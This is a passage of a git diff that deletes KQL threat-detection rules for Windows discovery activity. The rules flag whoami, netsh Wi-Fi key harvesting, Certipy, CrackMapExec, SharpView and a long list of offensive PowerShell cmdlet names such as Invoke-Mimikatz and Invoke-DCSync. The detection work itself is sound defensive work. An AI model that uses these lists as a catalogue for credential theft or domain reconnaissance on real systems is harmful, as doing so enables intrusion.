-// Date: 2023/01/19
-// Level: medium
-// Description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers
-// Tags: attack.discovery
-DeviceProcessEvents
-| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and (not(((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/Discovery/Enumerate_All_Information_With_Whoami.EXE.kql b/Discovery/Enumerate_All_Information_With_Whoami.EXE.kql
deleted file mode 100644
index f77ae57d..00000000
--- a/Discovery/Enumerate_All_Information_With_Whoami.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/12/04
-// Level: medium
-// Description: Detects the execution of "whoami.exe" with the "/all" flag
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -all" or ProcessCommandLine contains " /all") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/Discovery/File_And_SubFolder_Enumeration_Via_Dir_Command.kql b/Discovery/File_And_SubFolder_Enumeration_Via_Dir_Command.kql
deleted file mode 100644
index 18888bf8..00000000
--- a/Discovery/File_And_SubFolder_Enumeration_Via_Dir_Command.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: frack113
-// Date: 2021/12/13
-// Level: low
-// Description: Detects usage of the "dir" command part of Widows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.
-
-// Tags: attack.discovery, attack.t1217
-DeviceProcessEvents
-| where (ProcessCommandLine =~ "*dir*-s*" or ProcessCommandLine =~ "*dir*/s*") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Discovery/Firewall_Configuration_Discovery_Via_Netsh.EXE.kql b/Discovery/Firewall_Configuration_Discovery_Via_Netsh.EXE.kql
deleted file mode 100644
index 01471760..00000000
--- a/Discovery/Firewall_Configuration_Discovery_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
-// Date: 2021/12/07
-// Level: low
-// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
-// Tags: attack.discovery, attack.t1016
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "config " or ProcessCommandLine contains "state " or ProcessCommandLine contains "rule " or ProcessCommandLine contains "name=all") and (ProcessCommandLine contains "netsh " and ProcessCommandLine contains "show " and ProcessCommandLine contains "firewall ")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Discovery/Fsutil_Drive_Enumeration.kql b/Discovery/Fsutil_Drive_Enumeration.kql
deleted file mode 100644
index 32735e4a..00000000
--- a/Discovery/Fsutil_Drive_Enumeration.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
-// Date: 2022/03/29
-// Level: low
-// Description: Attackers may leverage fsutil to enumerated connected drives.
-// Tags: attack.discovery, attack.t1120
-DeviceProcessEvents
-| where ProcessCommandLine contains "drives" and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/Discovery/GatherNetworkInfo.VBS_Reconnaissance_Script_Output.kql b/Discovery/GatherNetworkInfo.VBS_Reconnaissance_Script_Output.kql
deleted file mode 100644
index d9c727d8..00000000
--- a/Discovery/GatherNetworkInfo.VBS_Reconnaissance_Script_Output.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: medium
-// Description: Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".
-// Tags: attack.discovery
-DeviceFileEvents
-| where (FolderPath endswith "\\Hotfixinfo.txt" or FolderPath endswith "\\netiostate.txt" or FolderPath endswith "\\sysportslog.txt" or FolderPath endswith "\\VmSwitchLog.evtx") and FolderPath startswith "C:\\Windows\\System32\\config"
\ No newline at end of file
diff --git a/Discovery/Gpresult_Display_Group_Policy_Information.kql b/Discovery/Gpresult_Display_Group_Policy_Information.kql
deleted file mode 100644
index b1461815..00000000
--- a/Discovery/Gpresult_Display_Group_Policy_Information.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/01
-// Level: medium
-// Description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information
-// Tags: attack.discovery, attack.t1615
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/z" or ProcessCommandLine contains "/v") and FolderPath endswith "\\gpresult.exe"
\ No newline at end of file
diff --git a/Discovery/Group_Membership_Reconnaissance_Via_Whoami.EXE.kql b/Discovery/Group_Membership_Reconnaissance_Via_Whoami.EXE.kql
deleted file mode 100644
index 07d24c69..00000000
--- a/Discovery/Group_Membership_Reconnaissance_Via_Whoami.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: medium
-// Description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.
-// Tags: attack.discovery, attack.t1033
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /groups" or ProcessCommandLine contains " -groups") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/Discovery/HackTool_-_Certify_Execution.kql b/Discovery/HackTool_-_Certify_Execution.kql
deleted file mode 100644
index 1f56d25c..00000000
--- a/Discovery/HackTool_-_Certify_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.
-// Tags: attack.discovery, attack.credential_access, attack.t1649
-DeviceProcessEvents
-| where (FolderPath endswith "\\Certify.exe" or ProcessVersionInfoOriginalFileName =~ "Certify.exe" or ProcessVersionInfoFileDescription contains "Certify") or ((ProcessCommandLine contains ".exe cas " or ProcessCommandLine contains ".exe find " or ProcessCommandLine contains ".exe pkiobjects " or ProcessCommandLine contains ".exe request " or ProcessCommandLine contains ".exe download ") and (ProcessCommandLine contains " /vulnerable" or ProcessCommandLine contains " /template:" or ProcessCommandLine contains " /altname:" or ProcessCommandLine contains " /domain:" or ProcessCommandLine contains " /path:" or ProcessCommandLine contains " /ca:"))
\ No newline at end of file
diff --git a/Discovery/HackTool_-_Certipy_Execution.kql b/Discovery/HackTool_-_Certipy_Execution.kql
deleted file mode 100644
index 39f45158..00000000
--- a/Discovery/HackTool_-_Certipy_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.
-// Tags: attack.discovery, attack.credential_access, attack.t1649
-DeviceProcessEvents
-| where (FolderPath endswith "\\Certipy.exe" or ProcessVersionInfoOriginalFileName =~ "Certipy.exe" or ProcessVersionInfoFileDescription contains "Certipy") or ((ProcessCommandLine contains " auth " or ProcessCommandLine contains " find " or ProcessCommandLine contains " forge " or ProcessCommandLine contains " relay " or ProcessCommandLine contains " req " or ProcessCommandLine contains " shadow ") and (ProcessCommandLine contains " -bloodhound" or ProcessCommandLine contains " -ca-pfx " or ProcessCommandLine contains " -dc-ip " or ProcessCommandLine contains " -kirbi" or ProcessCommandLine contains " -old-bloodhound" or ProcessCommandLine contains " -pfx " or ProcessCommandLine contains " -target" or ProcessCommandLine contains " -username " or ProcessCommandLine contains " -vulnerable" or ProcessCommandLine contains "auth -pfx" or ProcessCommandLine contains "shadow auto" or ProcessCommandLine contains "shadow list"))
\ No newline at end of file
diff --git a/Discovery/HackTool_-_CrackMapExec_Execution.kql b/Discovery/HackTool_-_CrackMapExec_Execution.kql
deleted file mode 100644
index 2272759d..00000000
--- a/Discovery/HackTool_-_CrackMapExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-DeviceProcessEvents
-| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/Discovery/HackTool_-_SharpLDAPmonitor_Execution.kql b/Discovery/HackTool_-_SharpLDAPmonitor_Execution.kql
deleted file mode 100644
index 0bdef452..00000000
--- a/Discovery/HackTool_-_SharpLDAPmonitor_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/30
-// Level: medium
-// Description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.
-// Tags: attack.discovery
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/dcip:") or (FolderPath endswith "\\SharpLDAPmonitor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpLDAPmonitor.exe")
\ No newline at end of file
diff --git a/Discovery/HackTool_-_SharpLdapWhoami_Execution.kql b/Discovery/HackTool_-_SharpLdapWhoami_Execution.kql
deleted file mode 100644
index e3ed1e0a..00000000
--- a/Discovery/HackTool_-_SharpLdapWhoami_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/29
-// Level: high
-// Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where (ProcessCommandLine endswith " /method:ntlm" or ProcessCommandLine endswith " /method:kerb" or ProcessCommandLine endswith " /method:nego" or ProcessCommandLine endswith " /m:nego" or ProcessCommandLine endswith " /m:ntlm" or ProcessCommandLine endswith " /m:kerb") or FolderPath endswith "\\SharpLdapWhoami.exe" or (ProcessVersionInfoOriginalFileName contains "SharpLdapWhoami" or ProcessVersionInfoProductName =~ "SharpLdapWhoami")
\ No newline at end of file
diff --git a/Discovery/HackTool_-_SharpView_Execution.kql b/Discovery/HackTool_-_SharpView_Execution.kql
deleted file mode 100644
index 4af5cead..00000000
--- a/Discovery/HackTool_-_SharpView_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/10
-// Level: high
-// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
-// Tags: attack.discovery, attack.t1049, attack.t1069.002, attack.t1482, attack.t1135, attack.t1033
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "SharpView.exe" or FolderPath endswith "\\SharpView.exe" or (ProcessCommandLine contains "Add-RemoteConnection" or ProcessCommandLine contains "Convert-ADName" or ProcessCommandLine contains "ConvertFrom-SID" or ProcessCommandLine contains "ConvertFrom-UACValue" or ProcessCommandLine contains "Convert-SidToName" or ProcessCommandLine contains "Export-PowerViewCSV" or ProcessCommandLine contains "Find-DomainObjectPropertyOutlier" or ProcessCommandLine contains "Find-DomainProcess" or ProcessCommandLine contains "Find-DomainShare" or ProcessCommandLine contains "Find-DomainUserEvent" or ProcessCommandLine contains "Find-DomainUserLocation" or ProcessCommandLine contains "Find-ForeignGroup" or ProcessCommandLine contains "Find-ForeignUser" or ProcessCommandLine contains "Find-GPOComputerAdmin" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-Interesting" or ProcessCommandLine contains "Find-LocalAdminAccess" or ProcessCommandLine contains "Find-ManagedSecurityGroups" or ProcessCommandLine contains "Get-CachedRDPConnection" or ProcessCommandLine contains "Get-DFSshare" or ProcessCommandLine contains "Get-DomainComputer" or ProcessCommandLine contains "Get-DomainController" or ProcessCommandLine contains "Get-DomainDFSShare" or ProcessCommandLine contains "Get-DomainDNSRecord" or ProcessCommandLine contains "Get-DomainFileServer" or ProcessCommandLine contains "Get-DomainForeign" or ProcessCommandLine contains "Get-DomainGPO" or ProcessCommandLine contains "Get-DomainGroup" or ProcessCommandLine contains "Get-DomainGUIDMap" or 
ProcessCommandLine contains "Get-DomainManagedSecurityGroup" or ProcessCommandLine contains "Get-DomainObject" or ProcessCommandLine contains "Get-DomainOU" or ProcessCommandLine contains "Get-DomainPolicy" or ProcessCommandLine contains "Get-DomainSID" or ProcessCommandLine contains "Get-DomainSite" or ProcessCommandLine contains "Get-DomainSPNTicket" or ProcessCommandLine contains "Get-DomainSubnet" or ProcessCommandLine contains "Get-DomainTrust" or ProcessCommandLine contains "Get-DomainUserEvent" or ProcessCommandLine contains "Get-ForestDomain" or ProcessCommandLine contains "Get-ForestGlobalCatalog" or ProcessCommandLine contains "Get-ForestTrust" or ProcessCommandLine contains "Get-GptTmpl" or ProcessCommandLine contains "Get-GroupsXML" or ProcessCommandLine contains "Get-LastLoggedOn" or ProcessCommandLine contains "Get-LoggedOnLocal" or ProcessCommandLine contains "Get-NetComputer" or ProcessCommandLine contains "Get-NetDomain" or ProcessCommandLine contains "Get-NetFileServer" or ProcessCommandLine contains "Get-NetForest" or ProcessCommandLine contains "Get-NetGPO" or ProcessCommandLine contains "Get-NetGroupMember" or ProcessCommandLine contains "Get-NetLocalGroup" or ProcessCommandLine contains "Get-NetLoggedon" or ProcessCommandLine contains "Get-NetOU" or ProcessCommandLine contains "Get-NetProcess" or ProcessCommandLine contains "Get-NetRDPSession" or ProcessCommandLine contains "Get-NetSession" or ProcessCommandLine contains "Get-NetShare" or ProcessCommandLine contains "Get-NetSite" or ProcessCommandLine contains "Get-NetSubnet" or ProcessCommandLine contains "Get-NetUser" or ProcessCommandLine contains "Get-PathAcl" or ProcessCommandLine contains "Get-PrincipalContext" or ProcessCommandLine contains "Get-RegistryMountedDrive" or ProcessCommandLine contains "Get-RegLoggedOn" or ProcessCommandLine contains "Get-WMIRegCachedRDPConnection" or ProcessCommandLine contains "Get-WMIRegLastLoggedOn" or ProcessCommandLine contains "Get-WMIRegMountedDrive" 
or ProcessCommandLine contains "Get-WMIRegProxy" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-CheckLocalAdminAccess" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-MapDomainTrust" or ProcessCommandLine contains "Invoke-RevertToSelf" or ProcessCommandLine contains "Invoke-Sharefinder" or ProcessCommandLine contains "Invoke-UserImpersonation" or ProcessCommandLine contains "Remove-DomainObjectAcl" or ProcessCommandLine contains "Remove-RemoteConnection" or ProcessCommandLine contains "Request-SPNTicket" or ProcessCommandLine contains "Set-DomainObject" or ProcessCommandLine contains "Test-AdminAccess")
\ No newline at end of file
diff --git a/Discovery/HackTool_-_TruffleSnout_Execution.kql b/Discovery/HackTool_-_TruffleSnout_Execution.kql
deleted file mode 100644
index 332dd084..00000000
--- a/Discovery/HackTool_-_TruffleSnout_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/20
-// Level: high
-// Description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.
-// Tags: attack.discovery, attack.t1482
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "TruffleSnout.exe" or FolderPath endswith "\\TruffleSnout.exe"
\ No newline at end of file
diff --git a/Discovery/HackTool_-_WinPwn_Execution.kql b/Discovery/HackTool_-_WinPwn_Execution.kql
deleted file mode 100644
index bd621578..00000000
--- a/Discovery/HackTool_-_WinPwn_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/12/04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
-// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/Discovery/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql b/Discovery/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql
deleted file mode 100644
index 7d6acba4..00000000
--- a/Discovery/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), oscd.community
-// Date: 2020/04/20
-// Level: medium
-// Description: Detect the harvesting of wifi credentials using netsh.exe
-// Tags: attack.discovery, attack.credential_access, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "wlan" and ProcessCommandLine contains " s" and ProcessCommandLine contains " p" and ProcessCommandLine contains " k" and ProcessCommandLine contains "=clear") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Discovery/Local_Accounts_Discovery.kql b/Discovery/Local_Accounts_Discovery.kql
deleted file mode 100644
index c0632ae6..00000000
--- a/Discovery/Local_Accounts_Discovery.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/21
-// Level: low
-// Description: Local accounts, System Owner/User discovery using operating systems utilities
-// Tags: attack.discovery, attack.t1033, attack.t1087.001
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " /c" and ProcessCommandLine contains "dir " and ProcessCommandLine contains "\\Users\\") and FolderPath endswith "\\cmd.exe") and (not(ProcessCommandLine contains " rmdir "))) or ((ProcessCommandLine contains "user" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) and (not((ProcessCommandLine contains "/domain" or ProcessCommandLine contains "/add" or ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/active" or ProcessCommandLine contains "/expires" or ProcessCommandLine contains "/passwordreq" or ProcessCommandLine contains "/scriptpath" or ProcessCommandLine contains "/times" or ProcessCommandLine contains "/workstations")))) or ((ProcessCommandLine contains " /l" and FolderPath endswith "\\cmdkey.exe") or (FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\qwinsta.exe") or ((ProcessCommandLine contains "useraccount" and ProcessCommandLine contains "get") and FolderPath endswith "\\wmic.exe"))
\ No newline at end of file
diff --git a/Discovery/Local_Groups_Reconnaissance_Via_Wmic.EXE.kql b/Discovery/Local_Groups_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index a64283b9..00000000
--- a/Discovery/Local_Groups_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: frack113
-// Date: 2021/12/12
-// Level: low
-// Description: Detects the execution of "wmic" with the "group" flag.
-Adversaries may attempt to find local system groups and permission settings.
-The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
-Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
-
-// Tags: attack.discovery, attack.t1069.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " group" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Discovery/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql b/Discovery/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql
deleted file mode 100644
index dd255075..00000000
--- a/Discovery/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/02
-// Level: high
-// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
-// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" 
or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or 
ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or 
ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or 
